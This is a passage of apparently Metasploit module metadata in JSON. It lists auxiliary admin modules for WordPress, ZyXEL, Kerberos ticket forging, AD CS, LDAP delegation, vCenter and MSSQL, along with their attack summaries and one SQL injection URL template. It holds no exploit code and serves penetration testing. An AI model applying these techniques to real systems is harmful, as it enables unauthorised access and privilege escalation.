8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/http/wp_symposium_sql_injection.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_symposium_sql_injection", - "check": true, - "post_auth": false, - "default_credential": false, - 
"notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/wp_wplms_privilege_escalation": { - "name": "WordPress WPLMS Theme Privilege Escalation", - "fullname": "auxiliary/admin/http/wp_wplms_privilege_escalation", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-02-09", - "type": "auxiliary", - "author": [ - "Evex", - "rastating" - ], - "description": "The WordPress WPLMS theme from version 1.5.2 to 1.8.4.1 allows an\n authenticated user of any user level to set any system option due to a lack of\n validation in the import_data function of /includes/func.php.\n\n The module first changes the admin e-mail address to prevent any\n notifications being sent to the actual administrator during the attack,\n re-enables user registration in case it has been disabled and sets the default\n role to be administrator. This will allow for the user to create a new account\n with admin privileges via the default registration page found at\n /wp-login.php?action=register.", - "references": [ - "WPVDB-7785" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/wp_wplms_privilege_escalation.rb", - "is_install_path": true, - "ref_name": "admin/http/wp_wplms_privilege_escalation", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/http/zyxel_admin_password_extractor": { - "name": "ZyXEL GS1510-16 Password Extractor", - "fullname": "auxiliary/admin/http/zyxel_admin_password_extractor", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Daniel Manser", - "Sven Vetsch" - ], - "description": "This module 
exploits a vulnerability in ZyXEL GS1510-16 routers\n to extract the admin password. Due to a lack of authentication on the\n webctrl.cgi script, unauthenticated attackers can recover the\n administrator password for these devices. The vulnerable device\n has reached end of life for support from the manufacturer, so it is\n unlikely this problem will be addressed.", - "references": [ - "URL-https://github.com/rapid7/metasploit-framework/pull/2709" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2023-02-08 14:30:08 +0000", - "path": "/modules/auxiliary/admin/http/zyxel_admin_password_extractor.rb", - "is_install_path": true, - "ref_name": "admin/http/zyxel_admin_password_extractor", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/kerberos/forge_ticket": { - "name": "Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging", - "fullname": "auxiliary/admin/kerberos/forge_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Benjamin Delpy", - "Dean Welch", - "alanfoster", - "smashery" - ], - "description": "This module forges a Kerberos ticket. 
Four different techniques can be used:\n - Silver ticket: Using a service account hash, craft a ticket impersonating any user and privileges to that account.\n - Golden ticket: Using the krbtgt hash, craft a ticket impersonating any user and privileges.\n - Diamond ticket: Authenticate to the domain controller, and using the krbtgt hash, copy the PAC from the authenticated user to a forged ticket.\n - Sapphire ticket: Use the S4U2Self+U2U trick to retrieve the PAC of another user, then use the krbtgt hash to craft a forged ticket.", - "references": [ - "URL-https://www.slideshare.net/gentilkiwi/abusing-microsoft-kerberos-sorry-you-guys-dont-get-it" - ], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-11-28 13:14:13 +0000", - "path": "/modules/auxiliary/admin/kerberos/forge_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/forge_ticket", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [], - "AKA": [ - "Ticketer", - "Klist" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "FORGE_DIAMOND", - "description": "Forge a Diamond Ticket" - }, - { - "name": "FORGE_GOLDEN", - "description": "Forge a Golden Ticket" - }, - { - "name": "FORGE_SAPPHIRE", - "description": "Forge a Sapphire Ticket" - }, - { - "name": "FORGE_SILVER", - "description": "Forge a Silver Ticket" - } - ] - }, - "auxiliary_admin/kerberos/get_ticket": { - "name": "Kerberos TGT/TGS Ticket Requester", - "fullname": "auxiliary/admin/kerberos/get_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Christophe De La Fuente", - "Spencer McIntyre", - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "smashery" - ], - "description": "This module requests TGT/TGS Kerberos 
tickets from the KDC", - "references": [], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-01-29 14:25:33 +0000", - "path": "/modules/auxiliary/admin/kerberos/get_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/get_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "getTGT", - "getST" - ], - "Stability": [ - "crash-safe" - ], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "GET_HASH", - "description": "Request a TGS to recover the NTLM hash" - }, - { - "name": "GET_TGS", - "description": "Request a Ticket-Granting-Service (TGS)" - }, - { - "name": "GET_TGT", - "description": "Request a Ticket-Granting-Ticket (TGT)" - } - ] - }, - "auxiliary_admin/kerberos/inspect_ticket": { - "name": "Kerberos Ticket Inspecting", - "fullname": "auxiliary/admin/kerberos/inspect_ticket", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Dean Welch" - ], - "description": "This module outputs the contents of a ccache/kirbi file and optionally (when provided with the appropriate key)\n decrypts and displays the encrypted content too.\n Can be used for inspecting tickets that aren't working as intended in an effort to debug them.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-01-26 09:21:55 +0000", - "path": "/modules/auxiliary/admin/kerberos/inspect_ticket.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/inspect_ticket", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [], - "AKA": [ - "klist" - ] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - 
"auxiliary_admin/kerberos/keytab": { - "name": "Kerberos keytab utilities", - "fullname": "auxiliary/admin/kerberos/keytab", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "alanfoster" - ], - "description": "Utilities for interacting with keytab files, which can store the hashed passwords of one or\n more principals.\n\n Discovered keytab files can be used to generate Kerberos Ticket Granting Tickets, or bruteforced\n offline.\n\n Keytab files can be also useful for decrypting Kerberos traffic using Wireshark dissectors,\n including the krbtgt encrypted blobs if the AES password hash is used.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2023-06-13 09:14:06 +0000", - "path": "/modules/auxiliary/admin/kerberos/keytab.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/keytab", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [], - "Reliability": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a new entry to the keytab file" - }, - { - "name": "EXPORT", - "description": "Export the current database creds to the keytab file" - }, - { - "name": "LIST", - "description": "List the entries in the keytab file" - } - ] - }, - "auxiliary_admin/kerberos/ms14_068_kerberos_checksum": { - "name": "MS14-068 Microsoft Kerberos Checksum Validation Vulnerability", - "fullname": "auxiliary/admin/kerberos/ms14_068_kerberos_checksum", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-11-18", - "type": "auxiliary", - "author": [ - "Tom Maddock", - "Sylvain Monne", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in the Microsoft Kerberos implementation. 
The problem\n exists in the verification of the Privilege Attribute Certificate (PAC) from a Kerberos TGS\n request, where a domain user may forge a PAC with arbitrary privileges, including\n Domain Administrator. This module requests a TGT ticket with a forged PAC and exports it to\n a MIT Kerberos Credential Cache file. It can be loaded on Windows systems with the Mimikatz\n help. It has been tested successfully on Windows 2008.", - "references": [ - "CVE-2014-6324", - "MSB-MS14-068", - "OSVDB-114751", - "URL-http://blogs.technet.com/b/srd/archive/2014/11/18/additional-information-about-cve-2014-6324.aspx", - "URL-https://labs.mwrinfosecurity.com/blog/2014/12/16/digging-into-ms14-068-exploitation-and-defence/", - "URL-http://web.archive.org/web/20180107213459/https://github.com/bidord/pykek", - "URL-https://www.rapid7.com/blog/post/2014/12/25/12-days-of-haxmas-ms14-068-now-in-metasploit" - ], - "platform": "", - "arch": "", - "rport": 88, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/ms14_068_kerberos_checksum", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/kerberos/ticket_converter": { - "name": "Kerberos ticket converter", - "fullname": "auxiliary/admin/kerberos/ticket_converter", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Zer1t0", - "Dean Welch" - ], - "description": "This module converts tickets to the ccache format from the kirbi format and vice versa.", - "references": [ - "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/ticketConverter.py", - "URL-https://tools.ietf.org/html/rfc4120", - 
"URL-http://web.mit.edu/KERBEROS/krb5-devel/doc/formats/ccache_file_format.html", - "URL-https://github.com/gentilkiwi/kekeo", - "URL-https://github.com/rvazarkar/KrbCredExport" - ], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2022-09-28 22:28:54 +0000", - "path": "/modules/auxiliary/admin/kerberos/ticket_converter.rb", - "is_install_path": true, - "ref_name": "admin/kerberos/ticket_converter", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "Reliability": [], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/ldap/ad_cs_cert_template": { - "name": "AD CS Certificate Template Management", - "fullname": "auxiliary/admin/ldap/ad_cs_cert_template", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Will Schroeder", - "Lee Christensen", - "Oliver Lyak", - "Spencer McIntyre" - ], - "description": "This module can create, read, update, and delete AD CS certificate templates from a Active Directory Domain\n Controller.\n\n The READ, UPDATE, and DELETE actions will write a copy of the certificate template to disk that can be\n restored using the CREATE or UPDATE actions. The CREATE and UPDATE actions require a certificate template data\n file to be specified to define the attributes. 
Template data files are provided to create a template that is\n vulnerable to ESC1, ESC2, ESC3 and ESC15.\n\n This module is capable of exploiting ESC4.", - "references": [ - "URL-https://github.com/GhostPack/Certify", - "URL-https://github.com/ly4k/Certipy" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-13 16:46:31 +0000", - "path": "/modules/auxiliary/admin/ldap/ad_cs_cert_template.rb", - "is_install_path": true, - "ref_name": "admin/ldap/ad_cs_cert_template", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [], - "AKA": [ - "Certifry", - "Certipy" - ] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CREATE", - "description": "Create the certificate template" - }, - { - "name": "DELETE", - "description": "Delete the certificate template" - }, - { - "name": "READ", - "description": "Read the certificate template" - }, - { - "name": "UPDATE", - "description": "Modify the certificate template" - } - ] - }, - "auxiliary_admin/ldap/change_password": { - "name": "Change Password", - "fullname": "auxiliary/admin/ldap/change_password", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "smashery" - ], - "description": "This module allows Active Directory users to change their own passwords, or reset passwords for\n accounts they have privileges over.", - "references": [ - "URL-https://github.com/fortra/impacket/blob/master/examples/changepasswd.py", - "URL-https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/6e803168-f140-4d23-b2d3-c3a8ab5917d2" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-12-06 16:47:25 +0000", - "path": 
"/modules/auxiliary/admin/ldap/change_password.rb", - "is_install_path": true, - "ref_name": "admin/ldap/change_password", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "CHANGE", - "description": "Change the user's password, knowing the existing password" - }, - { - "name": "RESET", - "description": "Reset a target user's password, having permissions over their account" - } - ] - }, - "auxiliary_admin/ldap/rbcd": { - "name": "Role Base Constrained Delegation", - "fullname": "auxiliary/admin/ldap/rbcd", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Podalirius", - "Charlie Bromberg", - "Spencer McIntyre" - ], - "description": "This module can read and write the necessary LDAP attributes to configure a particular object for Role Based\n Constrained Delegation (RBCD). When writing, the module will add an access control entry to allow the account\n specified in DELEGATE_FROM to the object specified in DELEGATE_TO. 
In order for this to succeed, the\n authenticated user must have write access to the target object (the object specified in DELEGATE_TO).", - "references": [ - "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution", - "URL-https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd", - "URL-https://github.com/SecureAuthCorp/impacket/blob/3c6713e309cae871d685fa443d3e21b7026a2155/examples/rbcd.py" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2025-02-13 16:46:31 +0000", - "path": "/modules/auxiliary/admin/ldap/rbcd.rb", - "is_install_path": true, - "ref_name": "admin/ldap/rbcd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "FLUSH", - "description": "Delete the security descriptor" - }, - { - "name": "READ", - "description": "Read the security descriptor" - }, - { - "name": "REMOVE", - "description": "Remove matching ACEs from the security descriptor DACL" - }, - { - "name": "WRITE", - "description": "Add an ACE to the security descriptor DACL" - } - ] - }, - "auxiliary_admin/ldap/shadow_credentials": { - "name": "Shadow Credentials", - "fullname": "auxiliary/admin/ldap/shadow_credentials", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Elad Shamir", - "smashery" - ], - "description": "This module can read and write the necessary LDAP attributes to configure a particular account with a\n Key Credential Link. This allows weaponising write access to a user account by adding a certificate\n that can subsequently be used to authenticate. 
In order for this to succeed, the authenticated user\n must have write access to the target object (the object specified in TARGET_USER).", - "references": [ - "URL-https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", - "URL-https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials" - ], - "platform": "", - "arch": "", - "rport": 389, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-05-02 13:57:13 +0000", - "path": "/modules/auxiliary/admin/ldap/shadow_credentials.rb", - "is_install_path": true, - "ref_name": "admin/ldap/shadow_credentials", - "check": false, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [], - "SideEffects": [ - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "ADD", - "description": "Add a credential to the account" - }, - { - "name": "FLUSH", - "description": "Delete all certificate entries" - }, - { - "name": "LIST", - "description": "Read all credentials associated with the account" - }, - { - "name": "REMOVE", - "description": "Remove matching certificate entries from the account object" - } - ] - }, - "auxiliary_admin/ldap/vmware_vcenter_vmdir_auth_bypass": { - "name": "VMware vCenter Server vmdir Authentication Bypass", - "fullname": "auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass", - "aliases": [], - "rank": 300, - "disclosure_date": "2020-04-09", - "type": "auxiliary", - "author": [ - "Hynek Petrak", - "JJ Lehmann", - "Ofri Ziv", - "wvu " - ], - "description": "This module bypasses LDAP authentication in VMware vCenter Server's\n vmdir service to add an arbitrary administrator user. 
Version 6.7\n prior to the 6.7U3f update is vulnerable, only if upgraded from a\n previous release line, such as 6.0 or 6.5.\n Note that it is also possible to provide a bind username and password\n to authenticate if the target is not vulnerable. It will add an\n arbitrary administrator user the same way.", - "references": [ - "CVE-2020-3952", - "URL-https://www.guardicore.com/2020/04/pwning-vmware-vcenter-cve-2020-3952/", - "URL-https://www.vmware.com/security/advisories/VMSA-2020-0006.html", - "URL-https://github.com/HynekPetrak/HynekPetrak/blob/master/take_over_vcenter_670.md" - ], - "platform": "", - "arch": "", - "rport": 636, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-05-02 13:57:13 +0000", - "path": "/modules/auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass.rb", - "is_install_path": true, - "ref_name": "admin/ldap/vmware_vcenter_vmdir_auth_bypass", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "service-resource-loss" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ], - "Reliability": [] - }, - "session_types": [ - "ldap" - ], - "needs_cleanup": false, - "actions": [ - { - "name": "Add", - "description": "Add an admin user" - } - ] - }, - "auxiliary_admin/maxdb/maxdb_cons_exec": { - "name": "SAP MaxDB cons.exe Remote Command Injection", - "fullname": "auxiliary/admin/maxdb/maxdb_cons_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-01-09", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "SAP MaxDB is prone to a remote command-injection vulnerability\n because the application fails to properly sanitize user-supplied input.", - "references": [ - "OSVDB-40210", - "BID-27206", - "CVE-2008-0244" - ], - "platform": "", - "arch": "", - "rport": 7210, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": 
"/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb", - "is_install_path": true, - "ref_name": "admin/maxdb/maxdb_cons_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/misc/sercomm_dump_config": { - "name": "SerComm Device Configuration Dump", - "fullname": "auxiliary/admin/misc/sercomm_dump_config", - "aliases": [], - "rank": 300, - "disclosure_date": "2013-12-31", - "type": "auxiliary", - "author": [ - "Eloi Vanderbeken ", - "Matt \"hostess\" Andreko " - ], - "description": "This module will dump the configuration of several SerComm devices. These devices\n typically include routers from NetGear and Linksys. This module was tested\n successfully against the NetGear DG834 series ADSL modem router.", - "references": [ - "OSVDB-101653", - "URL-https://github.com/elvanderb/TCP-32764" - ], - "platform": "", - "arch": "", - "rport": 32764, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2024-01-07 15:02:53 +0000", - "path": "/modules/auxiliary/admin/misc/sercomm_dump_config.rb", - "is_install_path": true, - "ref_name": "admin/misc/sercomm_dump_config", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/misc/wol": { - "name": "UDP Wake-On-Lan (WOL)", - "fullname": "auxiliary/admin/misc/wol", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "sinn3r " - ], - "description": "This module will turn on a remote machine with a network card that\n supports wake-on-lan (or MagicPacket). In order to use this, you must\n know the machine's MAC address in advance. The current default MAC\n address is just an example of how your input should look like.\n\n The password field is optional. 
If present, it should be in this hex\n format: 001122334455, which is translated to \"0x001122334455\" in binary.\n Note that this should be either 4 or 6 bytes long.", - "references": [], - "platform": "", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2019-03-05 04:43:37 +0000", - "path": "/modules/auxiliary/admin/misc/wol.rb", - "is_install_path": true, - "ref_name": "admin/misc/wol", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/motorola/wr850g_cred": { - "name": "Motorola WR850G v4.03 Credentials", - "fullname": "auxiliary/admin/motorola/wr850g_cred", - "aliases": [], - "rank": 300, - "disclosure_date": "2004-09-24", - "type": "auxiliary", - "author": [ - "kris katterjohn " - ], - "description": "Login credentials to the Motorola WR850G router with\n firmware v4.03 can be obtained via a simple GET request\n if issued while the administrator is logged in. 
A lot\n more information is available through this request, but\n you can get it all and more after logging in.", - "references": [ - "CVE-2004-1550", - "OSVDB-10232", - "URL-https://seclists.org/bugtraq/2004/Sep/0339.html" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/motorola/wr850g_cred.rb", - "is_install_path": true, - "ref_name": "admin/motorola/wr850g_cred", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/ms/ms08_059_his2006": { - "name": "Microsoft Host Integration Server 2006 Command Execution Vulnerability", - "fullname": "auxiliary/admin/ms/ms08_059_his2006", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-10-14", - "type": "auxiliary", - "author": [ - "MC " - ], - "description": "This module exploits a command-injection vulnerability in Microsoft Host Integration Server 2006.", - "references": [ - "MSB-MS08-059", - "CVE-2008-3466", - "OSVDB-49068", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=745" - ], - "platform": "", - "arch": "", - "rport": 0, - "autofilter_ports": [], - "autofilter_services": [], - "targets": null, - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/auxiliary/admin/ms/ms08_059_his2006.rb", - "is_install_path": true, - "ref_name": "admin/ms/ms08_059_his2006", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum": { - "name": "Microsoft SQL Server Configuration Enumerator", - "fullname": "auxiliary/admin/mssql/mssql_enum", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "Carlos Perez " - ], - "description": 
"This module will perform a series of configuration audits and\n security checks against a Microsoft SQL Server database. For this\n module to work, valid administrative user credentials must be\n supplied.", - "references": [], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_domain_accounts": { - "name": "Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "antti " - ], - "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function. This is similar to the smb_lookupsid module, but executed\n through SQL Server queries as any user with the PUBLIC role (everyone). Information that\n can be enumerated includes Windows domain users, groups, and computer accounts. 
Enumerated\n accounts can then be used in online dictionary attacks.", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-02-19 10:57:53 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_domain_accounts", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_domain_accounts_sqli": { - "name": "Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind ", - "antti " - ], - "description": "This module can be used to bruteforce RIDs associated with the domain of the SQL Server\n using the SUSER_SNAME function via Error Based SQL injection. This is similar to the\n smb_lookupsid module, but executed through SQL Server queries as any user with the PUBLIC\n role (everyone). Information that can be enumerated includes Windows domain users, groups,\n and computer accounts. 
Enumerated accounts can then be used in online dictionary attacks.\n The syntax for injection URLs is: /testing.asp?id=1+and+1=[SQLi];--", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": null, - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_domain_accounts_sqli", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_enum_sql_logins": { - "name": "Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration", - "fullname": "auxiliary/admin/mssql/mssql_enum_sql_logins", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to obtain a list of all logins from a SQL Server with any login.\n Selecting all of the logins from the master..syslogins table is restricted to sysadmins.\n However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server\n logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is\n pretty simple, because the principal IDs assigned to logins are incremental. Once logins\n have been enumerated they can be verified via sp_defaultdb error analysis. This is\n important, because not all of the principal IDs resolve to SQL logins (some resolve to\n roles instead). 
Once logins have been enumerated, they can be used in dictionary attacks.", - "references": [ - "URL-https://docs.microsoft.com/en-us/sql/t-sql/functions/suser-sname-transact-sql" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2023-12-12 09:53:37 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_enum_sql_logins.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_enum_sql_logins", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_dbowner": { - "name": "Microsoft SQL Server Escalate Db_Owner", - "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module can be used to escalate privileges to sysadmin if the user has\n the db_owner role in a trustworthy database owned by a sysadmin user. 
Once\n the user has the sysadmin role the msssql_payload module can be used to obtain\n a shell on the system.", - "references": [ - "URL-http://technet.microsoft.com/en-us/library/ms188676(v=sql.105).aspx" - ], - "platform": "", - "arch": "", - "rport": 1433, - "autofilter_ports": [ - 1433, - 1434, - 1435, - 14330, - 2533, - 9152, - 2638 - ], - "autofilter_services": [ - "ms-sql-s", - "ms-sql2000", - "sybase" - ], - "targets": null, - "mod_time": "2024-03-05 13:27:00 +0000", - "path": "/modules/auxiliary/admin/mssql/mssql_escalate_dbowner.rb", - "is_install_path": true, - "ref_name": "admin/mssql/mssql_escalate_dbowner", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": [ - "mssql" - ], - "needs_cleanup": false, - "actions": [] - }, - "auxiliary_admin/mssql/mssql_escalate_dbowner_sqli": { - "name": "Microsoft SQL Server SQLi Escalate Db_Owner", - "fullname": "auxiliary/admin/mssql/mssql_escalate_dbowner_sqli", - "aliases": [], - "rank": 300, - "disclosure_date": null, - "type": "auxiliary", - "author": [ - "nullbind " - ], - "description": "This module 